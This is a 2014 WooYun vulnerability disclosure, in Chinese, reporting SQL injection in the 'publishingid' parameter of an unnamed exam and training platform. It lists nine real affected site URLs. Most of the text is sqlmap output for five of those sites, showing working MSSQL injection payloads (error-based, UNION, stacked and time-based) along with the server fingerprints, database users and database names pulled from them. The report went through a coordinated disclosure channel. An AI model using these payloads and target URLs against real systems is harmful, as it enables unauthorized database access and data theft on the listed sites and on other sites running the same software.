漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-085882
漏洞标题:某不知名系统通用型sql注入
相关厂商:cncert国家互联网应急中心
漏洞作者: Mr.leo
提交时间:2014-12-08 12:58
修复时间:2015-03-08 13:00
公开时间:2015-03-08 13:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-12: 厂商已经确认,细节仅向厂商公开
2014-12-15: 细节向第三方安全合作伙伴开放
2015-02-05: 细节向核心白帽子及相关领域专家公开
2015-02-15: 细节向普通白帽子公开
2015-02-25: 细节向实习白帽子公开
2015-03-08: 细节向公众公开
简要描述:
某不知名系统通用型sql注入
详细说明:
WooYun: 某不知名系统多处sql注入漏洞 再补一刀
publishingid没有过滤导致注射
http://www.gxkjks.com/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.ndddpx.com/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.jzkjpx.cn/Web_Org/PxShop_Index.aspx?publishingid=106
http://webcourse.vixue.net/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.fenghuaedu.net/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.zhiyuan-peixun.com/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.gd-jxjy.com/Web_Org/PxShop_Index.aspx?publishingid=106
http://px2.timber2005.com/Web_Org/PxShop_Index.aspx?publishingid=106
http://www.ylscjb.cn/Web_Org/PxShop_Index.aspx?publishingid=106
前5个案例证明通用性
1、sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: publishingid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: publishingid=106 AND 8464=8464
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: publishingid=106 AND 8238=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(114
)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (8238=8238) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(121)+CHAR(113)+CHAR(58)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: publishingid=106 ; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: publishingid=106 WAITFOR DELAY '0:0:5'--
---
[17:12:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[17:12:02] [INFO] fetching current user
[17:12:07] [INFO] retrieved: NT AUTHORITY\\\\NETWORK SERVICE
current user: 'NT AUTHORITY\\NETWORK SERVICE'
[17:12:07] [INFO] fetching current database
[17:12:12] [INFO] retrieved: jzpexam
current database: 'jzpexam'
[17:12:12] [INFO] fetching database names
[17:12:17] [INFO] the SQL query used returns 14 entries
[17:12:22] [INFO] retrieved: ASPState
[17:12:27] [INFO] retrieved: ganxi
[17:12:32] [INFO] retrieved: gxkjksdatabase1
[17:12:36] [INFO] retrieved: gxzzkj_database
[17:12:41] [INFO] retrieved: jzpexam
[17:12:46] [INFO] retrieved: jzpexam2
[17:12:51] [INFO] retrieved: master
[17:12:56] [INFO] retrieved: model
[17:13:01] [INFO] retrieved: msdb
[17:13:06] [INFO] retrieved: newsys
[17:13:10] [INFO] retrieved: ReportServer
[17:13:15] [INFO] retrieved: ReportServerTempDB
[17:13:20] [INFO] retrieved: tempdb
[17:13:25] [INFO] retrieved: V5_EShop
available databases [14]:
[*] ASPState
[*] ganxi
[*] gxkjksdatabase1
[*] gxzzkj_database
[*] jzpexam
[*] jzpexam2
[*] master
[*] model
[*] msdb
[*] newsys
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] V5_EShop
[17:13:25] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 17 times
[17:13:25] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[17:13:25] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.gxkjks.com'
2、Place: GET
Parameter: publishingid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: publishingid=106 AND 5891=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(120)+
CHAR(109)+CHAR(58)+(SELECT (CASE WHEN (5891=5891) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(58)+CHAR(100)+CHAR(119)+CHAR(103)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (92) - 12 columns
Payload: publishingid=106 UNION ALL SELECT 92, 92, CHAR(58)+CHAR(98)+CHAR(12
0)+CHAR(109)+CHAR(58)+CHAR(118)+CHAR(85)+CHAR(100)+CHAR(107)+CHAR(70)+CHAR(97)+C
HAR(77)+CHAR(102)+CHAR(81)+CHAR(97)+CHAR(58)+CHAR(100)+CHAR(119)+CHAR(103)+CHAR(
58), 92, 92, 92, 92, 92, 92, 92, 92, 92--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: publishingid=106; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: publishingid=106 WAITFOR DELAY '0:0:5'--
---
[17:17:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:17:42] [INFO] fetching current user
[17:17:46] [WARNING] reflective value(s) found and filtering out
current user: 'ttos'
[17:17:46] [INFO] fetching current database
current database: 'Timber_Exam_Group'
[17:17:51] [INFO] fetching database names
[17:17:56] [INFO] the SQL query used returns 6 entries
[17:18:01] [INFO] retrieved: "master"
[17:18:06] [INFO] retrieved: "model"
[17:18:10] [INFO] retrieved: "msdb"
[17:18:15] [INFO] retrieved: "tempdb"
[17:18:20] [INFO] retrieved: "Timber_Exam_Group"
[17:18:25] [INFO] retrieved: "Timber_Exam_Org"
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Timber_Exam_Group
[*] Timber_Exam_Org
[17:18:26] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 9 times
[17:18:26] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[17:18:26] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.ndddpx.com'
3、sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: publishingid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: publishingid=106 AND 5673=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(116)
+CHAR(115)+CHAR(58)+(SELECT (CASE WHEN (5673=5673) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(58)+CHAR(107)+CHAR(111)+CHAR(108)+CHAR(58)))
---
[17:28:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[17:28:53] [INFO] fetching current user
[17:29:09] [INFO] retrieved: ttos
current user: 'ttos'
[17:29:09] [INFO] fetching current database
[17:29:26] [INFO] retrieved: Timber_Exam
current database: 'Timber_Exam'
[17:29:26] [INFO] fetching database names
[17:29:43] [INFO] the SQL query used returns 8 entries
[17:30:00] [WARNING] reflective value(s) found and filtering out
[17:32:16] [INFO] retrieved: Timber_Exam
[17:32:32] [INFO] retrieved: master
[17:32:49] [INFO] retrieved: tempdb
[17:33:06] [INFO] retrieved: model
[17:33:22] [INFO] retrieved: msdb
[17:33:39] [INFO] retrieved: pubs
[17:33:56] [INFO] retrieved: Northwind
[17:34:13] [INFO] retrieved: Timber_Exam
[17:34:29] [INFO] retrieved: JOB
[17:34:46] [INFO] retrieved:
available databases [9]:
[*] JOB
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] Timber_Exam
[17:34:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 13 times
[17:34:46] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[17:34:46] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.jzkjpx.cn'
4、sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: publishingid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: publishingid=106 AND 7464=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(116)
+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7464=7464) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(58)+CHAR(117)+CHAR(122)+CHAR(109)+CHAR(58)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: publishingid=106; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: publishingid=106 WAITFOR DELAY '0:0:5'--
---
[17:30:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[17:30:40] [INFO] fetching current user
[17:30:44] [INFO] retrieved: ttos
current user: 'ttos'
[17:30:44] [INFO] fetching current database
[17:30:49] [INFO] retrieved: Timber_Exam_Org_beijing
current database: 'Timber_Exam_Org_beijing'
[17:30:49] [INFO] fetching database names
[17:30:56] [INFO] the SQL query used returns 11 entries
[17:31:01] [WARNING] reflective value(s) found and filtering out
[17:31:56] [INFO] fetching number of databases
[17:31:56] [INFO] retrieved:
[17:31:56] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
11
[17:33:14] [INFO] retrieved: advAlly
[17:42:50] [INFO] retrieved: chinaacct
[17:54:40] [INFO] retrieved: maste
5、sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: publishingid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: publishingid=106 AND 5135=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(119)
+CHAR(97)+CHAR(58)+(SELECT (CASE WHEN (5135=5135) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(58)+CHAR(116)+CHAR(104)+CHAR(102)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (82) - 12 columns
Payload: publishingid=106 UNION ALL SELECT 82, 82, 82, 82, 82, 82, CHAR(58)+
CHAR(119)+CHAR(119)+CHAR(97)+CHAR(58)+CHAR(116)+CHAR(75)+CHAR(120)+CHAR(66)+CHAR
(71)+CHAR(112)+CHAR(109)+CHAR(65)+CHAR(73)+CHAR(105)+CHAR(58)+CHAR(116)+CHAR(104
)+CHAR(102)+CHAR(58), 82, 82, 82, 82, 82--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: publishingid=106; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: publishingid=106 WAITFOR DELAY '0:0:5'--
---
[17:50:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:50:37] [INFO] fetching current user
[17:50:42] [WARNING] reflective value(s) found and filtering out
current user: 'exam'
[17:50:42] [INFO] fetching current database
current database: 'exam'
[17:50:47] [INFO] fetching database names
[17:50:51] [INFO] the SQL query used returns 7 entries
[17:50:56] [INFO] retrieved: "exam"
[17:51:01] [INFO] retrieved: "master"
[17:51:05] [INFO] retrieved: "model"
[17:51:10] [INFO] retrieved: "msdb"
[17:51:15] [INFO] retrieved: "qdexam"
[17:51:19] [INFO] retrieved: "tempdb"
[17:51:24] [INFO] retrieved: "zz8love"
available databases [7]:
[*] exam
[*] master
[*] model
[*] msdb
[*] qdexam
[*] tempdb
[*] zz8love
[17:51:24] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 10 times
[17:51:24] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[17:51:24] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.fenghuaedu.net'
漏洞证明:
已经证明
修复方案:
过滤
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-12-12 19:01
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
最新状态:
暂无